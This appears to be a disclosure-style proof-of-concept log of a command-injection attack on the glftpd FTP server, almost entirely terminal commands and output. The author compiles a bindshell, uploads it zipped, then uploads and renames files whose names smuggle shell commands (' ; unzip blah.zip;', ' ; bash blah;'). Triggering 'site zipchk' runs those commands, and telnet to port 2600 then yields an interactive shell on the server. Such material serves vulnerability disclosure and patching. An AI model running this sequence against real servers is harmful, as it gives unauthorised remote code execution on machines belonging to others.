suid@suid.kg. 

This attack was performed against a default install of glftpd with a single user account added.
This attack was authorised (by me against me)

$ ftp
ftp> open ftp.target.com
Connected to 10.0.0.1.
220 GO AWAY
Name (ftp.target.com:suid): suid
331 Password required for suid.
Password:
230 User suid logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd Request
250- --NEWS--
250- 
250- New Feature:  Login with (!)Username to kill ghost connections.
250- 
250- 
250-       --=- Type SITE HELP for a list of special SITE commands -=--
250- 
250-                                     
250- ._____________________________________________________________________     
250- |    _      /   _     /   _    /   _     /  _____/____   ____/   ____/     
250- |    /_____/    /____/    /   /    /____/_____  /    /  /   /____   /     
250- |____|    ._______  /____    /_______  /_______/    /__/   /_______/ 
250- .-=-------------------- /____/ ---------------------------------------=-. 
250- `-=-------------------------------------------------------------------=-'
250-       `-----( Type 'site request title' to make a request )-----'
250- .-===================================================================-.
250- | Directory and Race Info for ./Request                               |
250- |-===================================================================-|
250- | Uploader     | Number of Files | Total Size (Bytes) |  % of Upload  |
250- |-===================================================================-|
250- | 1.glftpd     |               5 |          1,189,325 |        100.0% |
250- |______________|_________________|____________________|_______________|
250- | Total :   01 |               5 |          1,189,325 |        100.0% |
250- `-===================================================================-'
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for directory listing.
total 0
226 [Ul:0.0MB][Dl:0.0MB][Credits:14.6MB][Speed:0.00K/s][Free:2914MB]
ftp> ^Z
[1]+  Stopped                 ftp
$ gcc ~/bindshell.c -o b -static
$ cat > blah  
#!/bin/bash
./b &
^D
$ chmod a+rx b blah
$ zip blah.zip b blah
  adding: b (deflated 70%)
  adding: blah (stored 0%)
$ > " ; unzip blah.zip;"
$ > " ; bash blah;"
$ fg 
ftp     (wd: ~)
ftp> put blah.zip
local: blah.zip remote: blah.zip
200 PORT command successful.
150 Opening BINARY mode data connection for blah.zip.
226- Checking file integrity...
226- PASSED.  Extracting FILE_ID.DIZ...  
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:2770.37K/s][Free:2914MB]
274946 bytes sent in 0.0801 secs (3.4e+03 Kbytes/sec)
ftp> put " ; bash blah;"
local:  ; bash blah; remote:  ; bash blah;
200 PORT command successful.
150 Opening BINARY mode data connection for  ; bash blah;.
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:0.00K/s][Free:2914MB]
ftp> put " ; unzip blah.zip;"
local:  ; unzip blah.zip; remote:  ; unzip blah.zip;
200 PORT command successful.
150 Opening BINARY mode data connection for  ; unzip blah.zip;.
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:0.00K/s][Free:2914MB]
ftp> ls -al
200 PORT command successful.
150 Opening ASCII mode data connection for directory listing.
total 542
drwxrwxrwx   2 glftpd   glftpd       1024 Dec 23 00:04 .
drwxrwxrwx   3 glftpd   glftpd       1024 Dec 22 05:57 ..
-rw-rw-rw-   1 glftpd   glftpd          0 Dec 23 00:04 .message
-rw-r--r--   1 suid     NoGroup         0 Dec 23 00:04 _;_bash_blah;
-rw-r--r--   1 suid     NoGroup         0 Dec 23 00:04 _;_unzip_blah.zip;
-rw-r--r--   1 suid     NoGroup    274946 Dec 23 00:04 blah.zip
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:51.94K/s][Free:2914MB]
ftp> rename "_;_unzip_blah.zip;" " ; unzip blah.zip;"
350 File exists, ready for destination name
250 RNTO command successful.
ftp> rename "_;_bash_blah;" " ; bash blah;"
350 File exists, ready for destination name
250 RNTO command successful.
ftp> ls -la
200 PORT command successful.
150 Opening ASCII mode data connection for directory listing.
total 542
-rw-r--r--   1 suid     NoGroup         0 Dec 23 00:04  ; bash blah;
-rw-r--r--   1 suid     NoGroup         0 Dec 23 00:04  ; unzip blah.zip;
drwxrwxrwx   2 glftpd   glftpd       1024 Dec 23 00:05 .
drwxrwxrwx   3 glftpd   glftpd       1024 Dec 22 05:57 ..
-rw-rw-rw-   1 glftpd   glftpd          0 Dec 23 00:04 .message
-rw-r--r--   1 suid     NoGroup    274946 Dec 23 00:04 blah.zip
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:54.32K/s][Free:2914MB]
ftp> quote site zipchk " ; unzip blah.zip;"
unzip:  can't find /site/Request/, /site/Request/.zip or /site/Request/.ZIP, so there.
ftp> ls    
Archive:  blah.zip
ftp> ls
  inflating: b                       
ftp> ls
 extracting: blah                    
ftp> ls
200- File  ; unzip blah.zip; FAILED zipcheck.
200- 
200 Command successful.
200 PORT command successful.
ftp> ls -la
200 PORT command successful.
200 PORT command successful.
ftp> ls -la
200 PORT command successful.
150 Opening ASCII mode data connection for directory listing.
total 2329
-rw-r--r--   1 suid     NoGroup         0 Dec 23 00:04  ; bash blah;
-rw-r--r--   1 suid     NoGroup         0 Dec 23 00:04  ; unzip blah.zip;
drwxrwxrwx   2 glftpd   glftpd       1024 Dec 23 00:05 .
drwxrwxrwx   3 glftpd   glftpd       1024 Dec 22 05:57 ..
-rw-rw-rw-   1 glftpd   glftpd          0 Dec 23 00:04 .message
-rwxr-xr-x   1 suid     NoGroup    914359 Dec 23 00:01 b
-rwxr-xr-x   1 suid     NoGroup        18 Dec 23 00:02 blah
-rw-r--r--   1 suid     NoGroup    274946 Dec 23 00:04 blah.zip
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:46.36K/s][Free:2914MB]
ftp> quote site zipchk " ; bash blah;"
200 PORT command successful.
ftp> ls
150 Opening ASCII mode data connection for directory listing.
ftp> ls
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:74.83K/s][Free:2914MB]
200 PORT command successful.
ftp> ls
150 Opening ASCII mode data connection for directory listing.
ftp> ls
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:71.87K/s][Free:2914MB]
unzip:  can't find /site/Request/, /site/Request/.zip or /site/Request/.ZIP, so there.
ftp> ls
200- File  ; bash blah; FAILED zipcheck.
200- 
200 Command successful.
200 PORT command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for directory listing.
total 2325
-rw-r--r--   1 suid     NoGroup         0 Dec 23 00:04  ; bash blah;
-rw-r--r--   1 suid     NoGroup         0 Dec 23 00:04  ; unzip blah.zip;
-rwxr-xr-x   1 suid     NoGroup    914359 Dec 23 00:01 b
-rwxr-xr-x   1 suid     NoGroup        18 Dec 23 00:02 blah
-rw-r--r--   1 suid     NoGroup    274946 Dec 23 00:04 blah.zip
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:52.23K/s][Free:2914MB]
ftp> ^Z       
[1]+  Stopped                 ftp  (wd: ~)
$ telnet ftp.target.com 2600
Trying 10.0.0.1...
Connected to ftp.target.com.
Escape character is '^]'.
/bin/bash -i;
[suidl@ftp ~]$ ls -la
total 1173
-rw-r--r--   1 suid     NoGroup         0 Dec 23 00:04  ; bash blah;
-rw-r--r--   1 suid     NoGroup         0 Dec 23 00:04  ; unzip blah.zip;
drwxrwxrwx   2 glftpd   glftpd       1024 Dec 23 00:05 .
drwxrwxrwx   3 glftpd   glftpd       1024 Dec 22 05:57 ..
-rw-rw-rw-   1 glftpd   glftpd          0 Dec 23 00:04 .message
-rwxr-xr-x   1 suid     NoGroup    914359 Dec 23 00:01 b
-rwxr-xr-x   1 suid     NoGroup        18 Dec 23 00:02 blah
-rw-r--r--   1 suid     NoGroup    274946 Dec 23 00:04 blah.zip
[suid@ftp ~]$
[suid@ftp ~]$ exit
....